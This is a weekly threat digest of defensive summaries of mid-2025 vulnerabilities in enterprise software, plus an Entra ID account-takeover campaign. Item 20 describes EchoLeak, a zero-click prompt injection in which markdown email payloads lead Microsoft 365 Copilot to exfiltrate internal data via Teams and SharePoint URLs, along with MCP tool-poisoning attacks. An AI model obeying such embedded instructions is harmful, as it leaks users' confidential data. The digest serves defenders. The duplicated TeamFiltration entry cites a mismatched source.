Weekly Threat Landscape Digest – Week 25

1. Command Injection Vulnerability in Palo Alto Networks PAN-OS (CVE-2025-4230)

A medium-severity command injection vulnerability (CVE-2025-4230) has been identified in Palo Alto Networks PAN-OS. The flaw allows authenticated administrators with CLI access to bypass system restrictions and execute arbitrary commands as the root user. Successful exploitation may lead to full system compromise, data exfiltration, or service disruption.

Severity: Medium (CVSS 5.7)
Affected Component: PAN-OS CLI
Impact: Root-level command execution, privilege escalation

Affected Versions:

• PAN-OS 11.2.0 through 11.2.5
• PAN-OS 11.1.0 through 11.1.9
• PAN-OS 10.2.0 through 10.2.13
• PAN-OS 10.1.0 through 10.1.14
• All older unsupported versions

Fixed Versions:

• PAN-OS 11.2.6 or later
• PAN-OS 11.1.10 or later
• PAN-OS 10.2.14 or later
• PAN-OS 10.1.14-h15 or later

Recommendations:
Organizations should upgrade to the latest fixed versions immediately. Monitoring of administrative activities, implementation of least-privilege access for CLI users, and regular log review are also advised to detect potential abuse.

Reference:
https://security.paloaltonetworks.com/CVE-2025-4230

2. Reflected File Download Vulnerability in Spring Framework (CVE-2025-41234)

A medium-severity vulnerability (CVE-2025-41234) has been identified in the Spring Framework that may allow attackers to execute malicious code through a reflected file download (RFD) attack. The issue arises when the Content-Disposition header is set using a non-ASCII charset and the filename is based on unsanitized user input.

Severity: Medium (CVSS 6.5)
Impact: Reflected File Download (RFD), arbitrary code execution
Attack Vector: User tricked into downloading a malicious file

Affected Versions:

• Spring Framework 6.2.x prior to 6.2.8
• Spring Framework 6.1.x prior to 6.1.21
• Spring Framework 6.0.x prior to 6.0.29

Fixed Versions:

• 6.2.8 (OSS)
• 6.1.21 (OSS)
• 6.0.29 (Commercial)

Recommendations:
Organizations using affected Spring Framework versions should upgrade to the latest fixed releases. Additionally, developers should ensure proper sanitization of user input when generating file download responses to mitigate similar RFD risks.

Reference:
https://spring.io/security/cve-2025-41234

3. Multiple Vulnerabilities in Apache Tomcat (CVE-2025-48976, CVE-2025-48988, CVE-2025-49124, CVE-2025-49125)

Multiple vulnerabilities have been identified in Apache Tomcat that could be exploited to cause denial-of-service (DoS), privilege bypass, and installer abuse. Two of the issues are rated high severity and could disrupt services by exhausting system memory.

CVE-2025-48976 – Denial of Service via Multipart Header Overload
Severity: High
A malicious request with numerous multipart headers can exhaust system memory, leading to a denial of service.

CVE-2025-48988 – Multipart Upload Abuse
Severity: High
Flooding the server with multipart requests can exhaust memory resources, also resulting in a DoS condition.

CVE-2025-49124 – Windows Installer Side-Loading
Severity: Low
On Windows, the Tomcat installer invokes icacls.exe without specifying the full path, introducing a potential side-loading risk if a malicious executable is placed earlier in the system path.

CVE-2025-49125 – Security Constraint Bypass via Pre/PostResources
Severity: Medium
Applications using PreResources or PostResources mounted outside the root directory may inadvertently expose resources, allowing attackers to bypass security constraints.

Fixed Versions:

• Apache Tomcat 11.0.8 or later
• Apache Tomcat 10.1.42 or later
• Apache Tomcat 9.0.106 or later

Recommendations:
Organizations using affected versions of Apache Tomcat should immediately upgrade to the corresponding fixed versions. Regularly audit server configuration, avoid resource exposure outside application root, and validate system path settings on Windows deployments.

References:
https://lists.apache.org/thread/w7dbnfyqn1yc05kbqqbbyct7wbomv7lf
https://lists.apache.org/thread/z2d63tflwvqvdg3crz8d1sy2v3xsr4n8
https://lists.apache.org/thread/khdh7y3y1wogjocrz8jy8mmqzmgc9y5o
https://lists.apache.org/thread/0jwb3d3sjyfk5m6xnnj7h9m7ngxz23db

4. Critical Remote Code Execution Vulnerability in Veeam Backup & Replication (CVE-2025-23121)

A critical vulnerability (CVE-2025-23121) has been identified in Veeam Backup & Replication, allowing a remote authenticated domain user to execute arbitrary code on domain-joined backup servers. The flaw scores 9.9 (Critical) on the CVSS scale and could enable full system compromise, lateral movement, and potential ransomware staging in enterprise environments.

CVE-2025-23121 – Remote Code Execution on Backup Server

• Severity: Critical
• CVSS v3.0 Score: 9.9
• Impact: Remote code execution, system compromise
• Affected Versions: Veeam Backup & Replication 12.3.1.1139 and all earlier version 12 builds
• Fixed Version: 12.3.2 (build 12.3.2.3617)

Other Associated Vulnerabilities

CVE-2025-24286 – Backup Job Manipulation Leading to Code Execution

• Severity: High
• CVSS v3.1 Score: 7.2
• Affected Versions: Veeam Backup & Replication 12.3.1.1139 and earlier
• Fixed Version: 12.3.2 (build 12.3.2.3617)

CVE-2025-24287 – Local Privilege Escalation via Insecure Directory Permissions

• Severity: Medium
• CVSS v3.1 Score: 6.1
• Affected Product: Veeam Agent for Microsoft Windows 6.3.1.1074 and all earlier version 6 builds
• Fixed Version: 6.3.2 (build 6.3.2.1205)

Recommendations:

Organizations using Veeam products are strongly advised to upgrade to the latest patched versions immediately. Monitor domain user activity on backup servers and apply defense-in-depth strategies to reduce lateral movement risk. Ensure access to backup infrastructure is tightly controlled and logged.

Reference:
https://www.veeam.com/kb4743

5. High-Severity Vulnerabilities Patched in Google Chrome (CVE-2025-6191, CVE-2025-6192)

Google has released security updates for the Chrome browser addressing multiple high-severity vulnerabilities. Exploitation of these flaws could enable remote attackers to execute arbitrary code or cause memory corruption by simply luring users to malicious websites.

Key Vulnerabilities:

CVE-2025-6191 – Integer Overflow in V8

• Severity: High
• An integer overflow in the V8 JavaScript engine could allow memory manipulation during script execution. Exploitation may lead to arbitrary code execution or memory corruption.

CVE-2025-6192 – Use-After-Free in Profiler

• Severity: High
• A use-after-free issue in Chrome’s Profiler component may result in memory corruption or crashes exploitable for code execution.

Fixed Versions:

• Desktop Stable Channel:
  • Chrome 137.0.7151.119/.120 for Windows and Mac
  • Chrome 137.0.7151.119 for Linux
• Android Stable Channel:
  • Chrome 137.0.7151.115
• Extended Stable Updates (Desktop):
  • Chrome 136.0.7103.177 for Windows and Mac

Recommendations:

Users and enterprises should ensure all Chrome installations across platforms are updated to the latest available version. Consider enabling automatic updates and monitoring browser security configurations to reduce exposure to active threats.

References:
https://chromereleases.googleblog.com/2025/06/stable-channel-update-fordesktop_17.html
https://chromereleases.googleblog.com/

6. Critical Vulnerabilities in NetScaler ADC and NetScaler Gateway (CVE-2025-5777, CVE-2025-5349)

Two critical vulnerabilities have been identified in NetScaler ADC (formerly Citrix ADC) and NetScaler Gateway (formerly Citrix Gateway) that could allow attackers to gain unauthorized access to management interfaces or expose sensitive information through memory overread attacks.

CVE-2025-5777 – Memory Overread in Gateway Configurations

• Severity: Critical
• CVSS Base Score: 9.3
• Description: Exploitable when NetScaler is configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or as an AAA virtual server. Insufficient input validation could lead to memory overreads and data disclosure.

CVE-2025-5349 – Improper Access Control on Management Interface

• Severity: High
• CVSS Base Score: 8.7
• Description: An attacker with access to NSIP, Cluster Management IP, or local GSLB Site IP could bypass access controls and gain unauthorized administrative access.

Affected Versions:

• NetScaler ADC and Gateway 14.1 before 14.1-43.56
• NetScaler ADC and Gateway 13.1 before 13.1-58.32
• NetScaler ADC 13.1-FIPS and NDcPP before 13.1-37.235
• NetScaler ADC 12.1-FIPS before 12.1-55.328
• NetScaler ADC and Gateway 12.1 and 13.0 (EOL – upgrade mandatory)

Fixed Versions:

• NetScaler ADC and Gateway 14.1-43.56 and later
• NetScaler ADC and Gateway 13.1-58.32 and later
• NetScaler ADC 13.1-FIPS / NDcPP 13.1-37.235 and later
• NetScaler ADC 12.1-FIPS 12.1-55.328 and later

Recommendations:

All affected organizations should upgrade to the fixed versions immediately. Enforce strict access control to NSIP and management interfaces. Monitor network traffic for any suspicious attempts to access administrative ports or virtual server paths.

Reference:
https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX693420

7. Actively Exploited Privilege Escalation Vulnerability in Linux Kernel (CVE-2023-0386)

A critical local privilege escalation vulnerability in the Linux kernel’s OverlayFS subsystem, tracked as CVE-2023-0386, is being actively exploited in the wild. The flaw stems from improper handling of setuid/setgid bits during file copy-up operations between mounts, enabling unprivileged users to gain root-level access.

Vulnerability Overview:

• CVE ID: CVE-2023-0386
• Severity: High (CVSS v3.1 Score: 7.8)
• Vulnerability Type: Local Privilege Escalation
• Attack Vector: Local (requires unprivileged user access)
• Affected Component: OverlayFS in Linux Kernel
• Exploitation Status: Active exploitation confirmed
• PoC: Publicly available; tested and confirmed on Ubuntu 22.04

Risk & Impact:

• Attackers can escalate privileges from any local unprivileged account to root in seconds.
• Particularly dangerous in environments using containers, user namespaces, shared hosting, or CI/CD systems.
• Exploitation enables complete control over affected systems and lateral movement within networks.

Recommendations:

Organizations should immediately upgrade to a patched version of the Linux kernel. Where patching is delayed, limit access to untrusted users, disable user namespaces if not required, and audit systems for signs of privilege misuse.

Reference:
https://www.cve.org/CVERecord?id=CVE-2023-0386

8. Critical Vulnerability in Cisco ClamAV (CVE-2025-20260, CVE-2025-20234)

Cisco has disclosed two vulnerabilities in the ClamAV antivirus engine, a widely used open-source solution for malware scanning in email systems, network gateways, storage platforms, and endpoint protection tools. The most critical flaw enables remote code execution (RCE) and has been assigned a CVSS score of 9.8.

CVE-2025-20260 – Heap-Based Buffer Overflow in PDF Scanner

• Severity: Critical
• CVSS Score: 9.8
• Description: A heap-based buffer overflow vulnerability in the PDF scanning module that could lead to denial of service or arbitrary code execution under certain configurations.
• Affected Versions: ClamAV 1.0.0 through versions before 1.4.3

CVE-2025-20234 – Memory Over-Read in UDF Scanner

• Severity: Medium
• CVSS Score: 5.3
• Description: An over-read issue during Universal Disk Format (UDF) scanning could cause a denial-of-service condition.
• Affected Versions: ClamAV 1.2.0 through versions before 1.4.3

Affected Versions:

• General Users: All versions prior to 1.4.3
• LTS Releases: All versions prior to 1.0.9

Fixed Versions:

• ClamAV 1.4.3 (latest stable)
• ClamAV 1.0.9 (long-term support)

Recommendations:

All users of ClamAV should immediately upgrade to the latest patched version (1.4.3) or LTS version (1.0.9) depending on deployment. Monitor security logs for signs of abnormal PDF or UDF scanning behavior and restrict file upload capabilities where feasible.

Reference:
https://blog.clamav.net/2025/06/clamav-143-and-109-security-patch.html

9. Multiple Vulnerabilities Patched in GitLab CE/EE (CVE-2025-4278, CVE-2025-2254, CVE-2025-5121 & Others)

GitLab has released critical security updates for its Community Edition (CE) and Enterprise Edition (EE) to address multiple vulnerabilities ranging from account takeover and cross-site scripting (XSS) to denial-of-service (DoS) and information disclosure. Several of these issues carry high-severity CVSS scores above 8.0, warranting urgent patching.

Key High-Severity Vulnerabilities:

• CVE-2025-4278 – HTML Injection on Search Page
  CVSS 8.7 (High) – Could lead to account takeover through malicious HTML injection.
• CVE-2025-2254 – XSS in Snippet Viewer
  CVSS 8.7 (High) – Enables script execution in another user’s context.
• CVE-2025-5121 – Unauthorized CI/CD Pipeline Injection (EE Ultimate only)
  CVSS 8.5 (High) – Malicious pipeline jobs could be injected across projects.
• CVE-2025-0673 – DoS via Redirect Loop
  CVSS 7.5 (High) – Malformed redirects could exhaust memory and crash services.

Other Notable Vulnerabilities:

• CVE-2025-1516 / CVE-2025-1478 – DoS via large webhook token or board names (CVSS 6.5)
• CVE-2024-9512 – Repo cloning via sync delays (CVSS 5.3)
• CVE-2025-5996 – DoS through malformed HTTP responses (CVSS 6.5)
• CVE-2025-5195 – Unauthorized access to compliance frameworks (CVSS 4.3)
• CVE-2025-5982 – IP restriction bypass (EE only) (CVSS 3.7)

Fixed Versions:

• GitLab CE/EE:
  • 18.0.2
  • 17.11.4
  • 17.10.8

Recommendations:

Organizations using affected GitLab versions should upgrade immediately to the fixed releases. Regularly audit CI/CD jobs, enforce input sanitization, and monitor access control configurations to prevent exploitation.

Reference:
https://about.gitlab.com/releases/2025/06/11/patch-release-gitlab-18-0-2-released/

10. Critical Vulnerabilities in VMware Tanzu Greenplum

VMware has patched multiple critical vulnerabilities in Tanzu Greenplum, affecting the database engine, PL/Container (Python & R), and related components. Exploitation may lead to RCE, privilege escalation, and data compromise.

• Severity: Critical (CVSS up to 9.8)
• Affected Components:
  • Greenplum Server: CVE-2025-1094, CVE-2024-10979, CVE-2024-7348
  • PL/Container (Python & R): CVE-2024-3596, CVE-2023-37920, GHSA advisories
  • Go Stdlib / Cluster Management: CVE-2025-22871
• Fixed Version: VMware Tanzu Greenplum 7.5.0

Action Required:
Upgrade immediately to version 7.5.0. Review container usage and restrict access to vulnerable modules.

Reference:
https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/35843 

11. Remote Command Execution in Hikvision Wireless Access Points (CVE-2025-39240)

A high-severity RCE vulnerability (CVE-2025-39240) has been identified in several Hikvision Wireless Access Point models. The flaw allows authenticated attackers to execute arbitrary system commands via specially crafted packets, due to insufficient input validation.

• CVSS v3.1 Score: 7.2 (High)
• Impact: Remote Code Execution (RCE), device compromise
• Access Requirement: Valid credentials required

Affected Models (Prior to Fixed Firmware):

• DS-3WAP622G-SI
• DS-3WAP623E-SI
• DS-3WAP521-SI
• DS-3WAP522-SI
• DS-3WAP621E-SI
• DS-3WAP622E-SI

Fixed Version:

• Firmware version V1.1.6300 build250331 (R2263)

Recommendations:

Upgrade all affected Hikvision WAP devices to the latest fixed firmware. Audit device access controls and restrict management interface exposure.

Reference:
https://www.hikvision.com/en/support/cybersecurity/security-advisory/remotecommand-execution-vulnerability-in-some-hikvision-wireless-access-point/

12. Denial of Service in Cisco Meraki MX and Z Series VPN (CVE-2025-20271)

A high-severity DoS vulnerability (CVE-2025-20271) affects the Cisco AnyConnect VPN component of Meraki MX and Z Series devices. Unauthenticated attackers can trigger a service restart by sending crafted HTTPS requests, disrupting VPN connectivity.

• CVSS v3.1 Score: 8.6 (High)
• Impact: VPN session termination, connection denial
• Attack Vector: Remote, unauthenticated
• Root Cause: Improper variable initialization during SSL VPN setup

Affected Products:

• MX Series: MX64/65 (only if on firmware 17.6+), MX67/68/75/84/85/95/100/105/250/450, vMX
• Z Series: Z3, Z3C, Z4, Z4C
• MX400/600: Affected but no patch available (End-of-Life)

Fixed Versions:

• 18.1xx: 18.107.13
• 18.2xx: 18.211.6
• 19.1: 19.1.8
• 16.2 / 17.x: Must migrate to a fixed version

Recommendations:

Upgrade to a fixed firmware version as soon as possible. Disable client certificate authentication if not required and monitor VPN services for abnormal resets.

Reference:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sameraki-mx-vpn-dos-sM5GCfm7

13. Security Updates Across Atlassian Products (June 2025)

Atlassian has released multiple high-severity patches across its product line. Exploitation may lead to denial of service (DoS), improper authorization, and path traversal attacks.

Key CVEs & Affected Products:

• CVE-2025-22228 – Improper Authorization (CVSS 7.4)
• CVE-2025-24970, CVE-2024-57699, CVE-2025-31650 – DoS via dependencies (CVSS 7.5)
• CVE-2024-38816 – Path Traversal (CVSS 7.5)

Fixed Versions:

• Bamboo: 10.2.3, 9.6.14
• Bitbucket: 9.6.2, 9.5.2, 8.19.18, 8.9.27
• Confluence: 9.5.1, 9.2.5, 8.5.23
• Crowd: 5.3.6, 6.3.1
• Jira Software & Service Mgmt: 10.6.1, 10.3.6

Recommendations:

Update all Atlassian products to their respective patched versions. Prioritize instances exposed to external access and enforce access control policies.

Reference:
https://confluence.atlassian.com/security/security-bulletin-june-17-2025-1574012717.html 

14. RCE Vulnerability in BeyondTrust Remote Support & PRA (CVE-2025-5309)

A high-severity RCE vulnerability (CVE-2025-5309) has been identified in the chat functionality of BeyondTrust Remote Support (RS) and Privileged Remote Access (PRA). The flaw stems from a Server-Side Template Injection (SSTI) that could allow unauthenticated attackers to execute code on the server in certain cases.

• Severity: High
• CVSS v4 Score: 8.6
• Impact: Remote code execution via SSTI
• CWE: CWE-94 – Code Injection
• Exploit Status: No active exploitation reported (as of June 19, 2025)

Affected Versions:

• RS: 24.2.2–24.2.4, 24.3.1–24.3.3, 25.1.1
• PRA: 24.2.2–24.2.4, 24.3.1–24.3.3, 25.1.1

Fixed Versions:

• RS: 24.3.4 and above or patched with HELP-10826-2
• PRA: 25.1.2 and above or patched with HELP-10826-1 / HELP-10826-2

Recommendations:

Organizations using affected on-premise deployments should apply the appropriate patches immediately. Internet-exposed instances are at higher risk and should be prioritized.

Reference:
https://www.beyondtrust.com/trust-center/security-advisories/bt25-04

15. Privilege Escalation in WordPress AI Engine Plugin (CVE-2025-5071)

A high-severity privilege escalation vulnerability (CVE-2025-5071) has been identified in the AI Engine plugin for WordPress, affecting versions prior to 2.8.4. Authenticated users with subscriber-level access can escalate privileges to gain full administrative control of the site.

• CVSS Score: 8.8 (High)
• Root Cause: Insufficient validation in can_access_mcp() and the mwai_allow_mcp filter when MCP and Dev Tools features are enabled
• Impact: Full site takeover including plugin uploads, content modification, redirect injection, and admin control

Affected Versions:

• AI Engine plugin versions 2.8.0 to 2.8.3

Fixed Version:

• 2.8.4 and later

Recommendations:

• Update the plugin to v2.8.4 or newer
• Disable MCP and Dev Tools if not needed
• Enforce strong admin authentication
• Regularly audit user privileges and plugin settings
• Monitor for unusual admin activity

References:
https://www.wordfence.com/blog/2025/06/100000-wordpress-sites-affected-by-privilege-escalation-via-mcp-in-ai-engine-wordpress-plugin/
https://nvd.nist.gov/vuln/detail/CVE-2025-5071

17. UAE Cybersecurity Council Circular – Bolstering Defenses Amid Rising Threats

Amid escalating geopolitical tensions and increased global cyber activity, the UAE Cybersecurity Council has issued a circular urging all sectors to enhance their cyber defense posture. Organizations are advised to remain vigilant against phishing, DDoS attacks, and exploitation of unpatched vulnerabilities.

Key Recommendations:

• Activate SOC & Increase Vigilance
  • Report any unusual activity promptly
  • Enable real-time alerting and continuous monitoring
• Defend Against DDoS
  • Use anti-DDoS services from ISPs or security vendors
  • Verify configurations and response procedures
• Patch & Harden Systems
  • Apply all critical patches
  • Focus on internet-facing and actively exploited vulnerabilities
• Secure Identity & Access
  • Enforce MFA, especially for privileged accounts
  • Limit admin rights to essential users
• Segment & Secure Critical Infrastructure
  • Implement network segmentation
  • Disable unnecessary ports and services
• Update Incident Response Plans
  • Review escalation workflows
  • Conduct readiness exercises
• Ensure Backup & Recovery Readiness
  • Maintain offline, encrypted backups
  • Test restore procedures regularly
• Raise Awareness
  • Train staff on phishing and social engineering
  • Encourage reporting of suspicious activity

Reference:
https://assets.adgm.com/download/assets/20250615+-+Bolstering+Defenses+Against+Increased+Cyber+Threats.pdf/f0ecbda24a6c11f0a9e062f4f60e128f

18. Threat Actor Abuses TeamFiltration for Entra ID Account Takeovers

Proofpoint researchers have identified a large-scale account takeover (ATO) campaign dubbed “UNK_SneakyStrike”, which exploits the TeamFiltration open-source framework to compromise Microsoft Entra ID (formerly Azure AD) accounts.

Key Findings:

• Impact: Over 80,000 user accounts across ~100 cloud tenants targeted
• Tool: TeamFiltration (open-source pentest tool built for Microsoft 365 attacks)
• TTPs: Enumeration, password spraying via Microsoft Teams API
• Persistence: Exploits OAuth misconfigurations, conditional access gaps, and refresh tokens
• Data Exfiltration: Pulls chat logs, files, and contact lists from Teams and OneDrive

Attack Mechanics:

• Uses rotating AWS regions for geo-distributed password spraying
• Leverages Teams API for silent enumeration
• Exploits family refresh tokens (FRTs) to access multiple Microsoft services once a foothold is established
• Operates stealthily by mimicking legitimate traffic patterns via cloud-native APIs

Detection Challenges:

• TeamFiltration blends in with normal user activity, making it harder to detect than traditional tools
• Attacks often focus broadly on small tenants and selectively on larger ones

Recommendations:

• Enforce MFA for all apps and users
• Audit and correct conditional access policy gaps
• Monitor for login anomalies and token abuse
• Review behavioral IOCs linked to UNK_SneakyStrike campaigns

Reference:
https://www.darkreading.com/cloud-security/threat-actor-teamfiltration-entra-id-attacks

19. Threat Actor Abuses TeamFiltration for Microsoft Entra ID Account Takeovers

Campaign Name: UNK_SneakyStrike
Tool Abused: TeamFiltration (Open-source pentest framework)
Target: Microsoft Entra ID (formerly Azure AD)
Impact: Over 80,000 accounts across ~100 cloud tenants

 Key Details:

• Initial Vector: Password spraying and enumeration via Teams API
• Infrastructure: AWS accounts rotating regions for stealth
• Persistence: Misused conditional access gaps; bypassed MFA in Teams
• Exfiltration: Extracted chat logs, files, and contacts from Teams & OneDrive
• Stealth: Operates via legitimate APIs, blends in with user activity

 Tactics & Techniques:

• API Abuse: Microsoft Teams, OneDrive
• Cloud-native APT: Bypasses security controls using valid credentials
• Token Abuse: Family Refresh Tokens (FRTs) leveraged for lateral access
• Access Strategy:
  • Targets all users in smaller tenants
  • Filters high-value users in large tenants

 Recommended Actions:

• Enforce MFA across all apps, especially Teams
• Audit Conditional Access Policies
• Monitor OAuth token usage and Teams/Graph API activity
• Leverage behavioral analytics for anomaly detection

Source:
https://www.recordedfuture.com/research/predator-still-active-new-links-identified 

20. EchoLeak: Zero-Click AI Vulnerability in Microsoft 365 Copilot (CVE-2025-32711)

A critical zero-click vulnerability named EchoLeak has been discovered in Microsoft 365 Copilot, allowing attackers to exfiltrate sensitive data without user interaction via AI prompt injection.

• CVE: CVE-2025-32711
• CVSS: 9.3 (Critical)
• Discovered by: Aim Security
• Patched by Microsoft: Yes, June 2025 Patch Tuesday
• Exploitation in the wild: No confirmed cases

How It Works:

• Attackers embed malicious prompt payloads in markdown-formatted content (e.g., emails)
• Copilot’s RAG engine combines untrusted input with sensitive internal context
• Sensitive data is silently exfiltrated via Teams and SharePoint URLs

Risk Highlights:

• No clicks or user interaction needed (true zero-click)
• Exploits LLM Scope Violation and Retrieval-Augmented Generation (RAG) flaws
• Can leak confidential business info, reports, credentials

Related AI Threats:

• Full-Schema Poisoning (FSP): Tool poisoning in Model Context Protocol (MCP) allows LLMs to be misled via fake tool behaviors
• MCP Rebinding Attack: Uses DNS rebinding and Server-Sent Events (SSE) to exfiltrate data from localhost MCP servers

Recommendations:

• Review AI assistant usage policies and data access controls
• Limit AI exposure to sensitive document sources
• Monitor AI-driven data access logs for anomalies
• Enforce strong validation of AI inputs and origins

Reference:
https://thehackernews.com/2025/06/zero-click-ai-vulnerability-exposes.html